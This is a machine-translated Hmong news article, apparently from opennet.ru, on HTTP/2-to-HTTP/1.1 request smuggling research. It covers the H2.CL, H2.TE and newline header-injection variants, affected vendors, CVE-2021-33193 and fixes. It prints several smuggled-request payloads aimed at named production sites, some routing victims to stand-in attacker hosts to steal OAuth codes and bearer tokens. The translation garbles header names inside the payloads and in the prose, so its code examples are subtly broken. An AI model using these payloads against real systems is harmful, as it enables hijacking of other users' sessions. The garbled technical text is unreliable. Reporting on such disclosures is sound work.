Lub vev xaib nyob rau hauv uas lub hauv ntej kawg lees txais kev sib txuas ntawm HTTP / 2 thiab xa lawv mus rau backend ntawm HTTP / 1.1 tau nthuav tawm qhov hloov tshiab ntawm "HTTP Thov Smuggling" nres, uas tso cai, los ntawm kev xa cov neeg thov tshwj xeeb tsim, mus rau wedge rau hauv cov ntsiab lus ntawm kev thov los ntawm lwm tus neeg siv ua tiav hauv tib qhov ntws ntawm frontend thiab backend. Qhov kev tawm tsam tuaj yeem siv los ntxig rau qhov tsis zoo JavaScript code rau hauv kev sib tham nrog lub vev xaib raug cai, hla kev nkag mus rau cov kev txwv tsis pub nkag mus thiab cuam tshuam qhov kev lees paub tsis raug.
Qhov teeb meem cuam tshuam rau lub vev xaib proxies, load balancers, web accelerators, cov ntsiab lus xa khoom thiab lwm yam kev teeb tsa uas kev thov raug xa rov qab mus rau pem hauv ntej-rau-rov qab. Tus sau ntawm txoj kev tshawb no qhia tau hais tias muaj peev xwm tawm tsam cov kab ke ntawm Netflix, Verizon, Bitbucket, Netlify CDN thiab Atlassian, thiab tau txais 56 txhiab nyiaj hauv cov nqi zog rau kev txheeb xyuas qhov tsis zoo. Qhov teeb meem kuj tau lees paub hauv F5 Networks cov khoom. Qhov teeb meem ib feem cuam tshuam rau mod_proxy hauv Apache http server (CVE-2021-33193), kev txhim kho yog xav tau hauv version 2.4.49 (cov neeg tsim khoom tau ceeb toom txog qhov teeb meem thaum ntxov Lub Tsib Hlis thiab tau muab 3 lub hlis los kho nws). Hauv nginx, lub peev xwm los qhia ib txhij ntawm "Cov ntsiab lus-Length" thiab "Transfer-Encoding" headers raug thaiv hauv qhov kev tso tawm kawg (1.21.1). Cov cuab yeej tawm tsam twb tau suav nrog hauv Burp toolkit thiab muaj nyob rau hauv daim ntawv ntawm Turbo Intruder txuas ntxiv.
Lub hauv paus ntsiab lus ntawm kev ua haujlwm ntawm txoj kev tshiab ntawm wedging thov rau hauv tsheb yog zoo ib yam li qhov tsis zoo uas tau txheeb xyuas los ntawm tib tus kws tshawb fawb ob xyoos dhau los, tab sis tsuas yog txwv rau frontends uas lees txais kev thov dhau HTTP / 1.1. Cia peb nco qab tias nyob rau hauv cov phiaj xwm frontend-backend, cov neeg thov kev thov tau txais los ntawm ib qho ntxiv - lub frontend, uas tsim kom muaj kev sib txuas nrog TCP ntev nrog lub backend, uas ncaj qha ua cov lus thov. Los ntawm qhov kev sib txuas no, kev thov los ntawm cov neeg siv sib txawv feem ntau kis tau, uas ua raws cov saw hlau ib tom qab, sib cais los ntawm HTTP raws tu qauv.
Qhov classic "HTTP Thov Smuggling" nres yog raws li qhov tseeb tias frontends thiab backends txhais kev siv HTTP headers "Cov ntsiab lus-Length" (txiav txim siab tag nrho qhov loj ntawm cov ntaub ntawv hauv qhov kev thov) thiab "Hloov-Encoding: chunked" (tso cai. cov ntaub ntawv yuav raug xa mus rau qhov chaw) sib txawv.. Piv txwv li, yog tias lub frontend tsuas txhawb "Cov ntsiab lus-Length" tab sis tsis quav ntsej "Hloov-Encoding: chunked", ces tus neeg tawm tsam tuaj yeem xa daim ntawv thov uas muaj ob qho "Tsev-Length" thiab "Transfer-Encoding: chunked" headers, tab sis qhov loj yog "Cov ntsiab lus-Length" tsis phim qhov loj ntawm cov saw chunked. Nyob rau hauv cov ntaub ntawv no, lub frontend yuav ua thiab redirect qhov kev thov nyob rau hauv raws li "Cov ntsiab lus-Length", thiab lub backend yuav tos kom tiav ntawm lub block raws li "Transfer-Encoding: chunked" thiab seem seem ntawm tus neeg tawm tsam qhov kev thov yuav nyob rau ntawm qhov pib ntawm lwm tus neeg qhov kev thov kis tom ntej.
Tsis zoo li cov ntawv nyeem raws tu qauv HTTP / 1.1, uas yog parsed ntawm kab theem, HTTP / 2 yog ib tug binary raws tu qauv thiab tswj cov ntaub ntawv blocks ntawm ib tug pre-txheej loj. Txawm li cas los xij, HTTP / 2 siv pseudo-headers uas sib haum rau HTTP headers li niaj zaus. Nyob rau hauv rooj plaub ntawm kev cuam tshuam nrog lub backend ntawm HTTP / 1.1 raws tu qauv, lub frontend txhais cov pseudo-headers rau hauv HTTP headers zoo sib xws HTTP / 1.1. Qhov teeb meem yog tias lub backend txiav txim siab txog kev txheeb xyuas cov kwj deg raws li HTTP headers teeb tsa los ntawm frontend, tsis muaj cov ntaub ntawv hais txog qhov tsis muaj ntawm qhov kev thov thawj.
Tshwj xeeb, qhov tseem ceeb "cov ntsiab lus-ntev" thiab "hloov-encoding" tuaj yeem xa mus rau hauv daim ntawv pseudo-headers, txawm tias lawv tsis siv hauv HTTP / 2, txij li qhov loj ntawm tag nrho cov ntaub ntawv raug txiav txim. nyob rau hauv ib qho chaw sib cais. Txawm li cas los xij, thaum lub sijhawm hloov pauv qhov kev thov HTTP / 2 rau HTTP / 1.1, cov headers no tau dhau mus thiab tuaj yeem cuam tshuam qhov backend. Muaj ob hom kev tawm tsam tseem ceeb: H2.TE thiab H2.CL, uas lub backend raug yuam kev los ntawm qhov tsis raug hloov-encoding lossis cov ntsiab lus-ntev tus nqi uas tsis sib haum rau qhov loj me ntawm lub cev thov tau txais los ntawm frontend ntawm lub HTTP/2 raws tu qauv.
Ib qho piv txwv ntawm kev tawm tsam H2.CL yog txhawm rau qhia qhov loj me tsis raug hauv cov ntsiab lus-ntev pseudo-header thaum xa HTTP / 2 thov rau Netflix. Qhov kev thov no ua rau muaj qhov sib ntxiv ntawm HTTP header Cov ntsiab lus-Length thaum nkag mus rau qhov backend ntawm HTTP / 1.1, tab sis txij li qhov loj me hauv Cov ntsiab lus-Length tau teev tsawg dua qhov tseeb, ib feem ntawm cov ntaub ntawv hauv tus Tsov tus tw tau ua tiav raws li qhov pib ntawm qhov kev thov tom ntej.
Piv txwv li, thov HTTP/2 : method POST :path /n :authority www.netflix.com content-length 4 abcdGET /n HTTP/1.1 Host: 02.rs?x.netflix.com Foo: bar
Yuav ua rau muaj kev thov xa mus rau qhov backend: POST /n HTTP/1.1 Tus Tswv: www.netflix.com Cov ntsiab lus-Length: 4 abcdGET /n HTTP/1.1 Tus Tswv: 02.rs?x.netflix.com Foo: bar
Txij li cov ntsiab lus-Length muaj tus nqi ntawm 4, lub backend yuav lees txais tsuas yog "abcd" raws li lub cev ntawm qhov kev thov, thiab qhov seem ntawm "GET / n HTTP / 1.1 ... " yuav raug ua tiav raws li qhov pib ntawm kev thov tom ntej. txuam nrog lwm tus neeg siv. Raws li, cov kwj yuav dhau los ua desynchronized thiab teb rau qhov kev thov tom ntej, qhov tshwm sim ntawm kev ua cov ntawv thov dummy yuav raug muab tawm. Nyob rau hauv rooj plaub ntawm Netflix, qhia txog tus tswv tsev thib peb hauv "Tus Tswv:" lub taub hau hauv qhov kev thov dummy ua rau tus neeg siv rov qab cov lus teb "Qhov chaw: https://02.rs?x.netflix.com/n" thiab tso cai rau cov ntsiab lus arbitrary xa mus rau tus neeg siv khoom, suav nrog Khiav koj tus lej JavaScript hauv cov ntsiab lus ntawm Netflix qhov chaw.
Qhov kev xaiv thib ob (H2.TE) suav nrog hloov qhov "Transfer-Encoding: chunked" header. Kev siv cov hloov-encoding pseudo-header hauv HTTP / 2 yog txwv tsis pub los ntawm cov lus qhia tshwj xeeb thiab kev thov nrog nws raug sau kom raug kho raws li qhov tsis raug. Txawm hais tias qhov no, qee qhov kev siv ua ntej tsis suav qhov yuav tsum tau ua rau hauv tus account thiab tso cai rau kev siv hloov pauv-encoding pseudo-header hauv HTTP / 2, uas tau hloov mus rau hauv HTTP header zoo sib xws. Yog tias muaj "Transfer-Encoding" header, lub backend tuaj yeem ua qhov tseem ceeb dua thiab txheeb xyuas cov ntaub ntawv los ntawm ib qho hauv "chunked" hom siv blocks ntawm ntau qhov sib txawv hauv hom "{size}\r\n{block }\r\n{size} \r\n{block}\r\n0", txawm tias pib faib los ntawm qhov loj tag nrho.
Lub xub ntiag ntawm qhov sib txawv no tau tshwm sim los ntawm qhov piv txwv ntawm Verizon. Qhov teeb meem cuam tshuam txog kev lees paub lub portal thiab kev tswj hwm cov ntsiab lus, uas tseem siv rau ntawm qhov chaw xws li Huffington Post thiab Engadget. Piv txwv li, tus neeg thov kev thov ntawm HTTP / 2: :method POST :path /identitfy/XUI :authority id.b2b.oath.com hloov-encoding chunked 0 GET /oops HTTP/1.1 Host: psres.net Cov ntsiab lus-Length: 10 x =
Ua rau xa HTTP/1.1 thov mus rau qhov backend: POST /identity/XUI HTTP/1.1 Tus Tswv: id.b2b.oath.com Cov ntsiab lus-Length: 66 Hloov-Encoding: chunked 0 GET /oops HTTP/1.1 Tus Tswv: psres. net Cov ntsiab lus- Length: 10x =
Lub backend, nyob rau hauv lem, tsis quav ntsej lub "Cov ntsiab lus-Length" header thiab ua nyob rau hauv-kwj splitting raws li "Transfer-Encoding: chunked". Hauv kev xyaum, qhov kev tawm tsam ua rau nws muaj peev xwm hloov cov neeg siv cov lus thov mus rau lawv lub vev xaib, suav nrog kev cuam tshuam cov lus thov cuam tshuam nrog OAuth authentication, cov kev txwv uas tau tshwm sim nyob rau hauv Referer header, nrog rau simulating kev sib kho qhov tseeb thiab ua rau tus neeg siv lub kaw lus xa ntawv pov thawj. mus rau tus tswv tsev tawm tsam. GET /b2blanding/show/oops HTTP/1.1 Host: psres.net Xa mus rau: https://id.b2b.oath.com/?β¦&code=secret GET / HTTP/1.1 Tus Tswv: psres.net Tso cai: Bearer eyJhcGwiOiJIUzI1Gi1sInR6cCI6Ik
Txhawm rau tawm tsam HTTP / 2 qhov kev siv uas tsis tso cai rau kev hloov pauv-encoding pseudo-header kom tau teev tseg, lwm txoj hauv kev tau thov uas suav nrog kev hloov pauv "Transfer-Encoding" header los ntawm kev txuas mus rau lwm qhov pseudo-headers sib cais los ntawm cov cim tshiab ( thaum hloov dua siab tshiab rau HTTP/1.1 nyob rau hauv cov ntaub ntawv no tsim ob cais HTTP headers).
Piv txwv li, Atlassian Jira thiab Netlify CDN (siv los ua haujlwm rau Mozilla pib nplooj ntawv hauv Firefox) tau cuam tshuam los ntawm qhov teeb meem no. Tshwj xeeb, HTTP / 2 thov : txoj kev POST : path / : authority start.mozilla.org foo b\r\n hloov-encoding: chunked 0\r\n \r\n GET / HTTP/1.1\r\n Host : evil-netlify-domain\r\n Cov ntsiab lus-Length: 5\r\n \r\n x=
ua rau HTTP / 1.1 POST / HTTP / 1.1 thov raug xa mus rau qhov backend\r\n Host: start.mozilla.org\r\n Foo: b\r\n Hloov-Encoding: chunked\r\n Cov ntsiab lus-Length : 71\ r\n \r\n 0\r\n \r\n GET / HTTP/1.1\r\n Host: evil-netlify-domain\r\n Cov ntsiab lus-Length: 5\r\n \r \n x =
Lwm qhov kev xaiv los hloov qhov "Transfer-Encoding" header yog xa mus rau lub npe ntawm lwm tus pseudo-header lossis rau kab nrog txoj kev thov. Piv txwv li, thaum nkag mus rau Atlassian Jira, lub pseudo-header lub npe "foo: bar\r\ntransfer-encoding" nrog tus nqi "chunked" ua rau HTTP headers "foo: bar" thiab "transfer-encoding: chunked" ntxiv. , thiab qhia pseudo-header ": txoj kev" tus nqi "GET / HTTP / 1.1\r\nTransfer-encoding: chunked" tau txhais rau "GET / HTTP/1.1\r\ntransfer-encoding: chunked".
Tus kws tshawb fawb uas tau txheeb xyuas qhov teeb meem kuj tau thov cov txheej txheem tunneling los tawm tsam frontends, uas txhua tus IP chaw tsim kev sib txuas rau lub backend thiab kev khiav tsheb los ntawm cov neeg siv sib txawv tsis sib xyaw. Cov txheej txheem thov tsis tso cai cuam tshuam nrog kev thov los ntawm lwm tus neeg siv, tab sis ua rau nws muaj peev xwm ua rau muaj kab mob sib koom ua ke uas cuam tshuam rau kev ua haujlwm ntawm lwm qhov kev thov, thiab tso cai rau kev hloov pauv ntawm HTTP headers siv los hloov cov ntaub ntawv kev pabcuam los ntawm frontend mus rau backend ( Piv txwv li, thaum ua pov thawj ntawm sab pem hauv ntej hauv Cov headers tuaj yeem xa cov ntaub ntawv hais txog tus neeg siv tam sim no mus rau lub backend). Raws li ib qho piv txwv ntawm kev siv cov qauv hauv kev xyaum, siv cache lom, nws muaj peev xwm tau txais kev tswj xyuas cov nplooj ntawv hauv Bitbucket kev pabcuam.
Tau qhov twg los: opennet.ru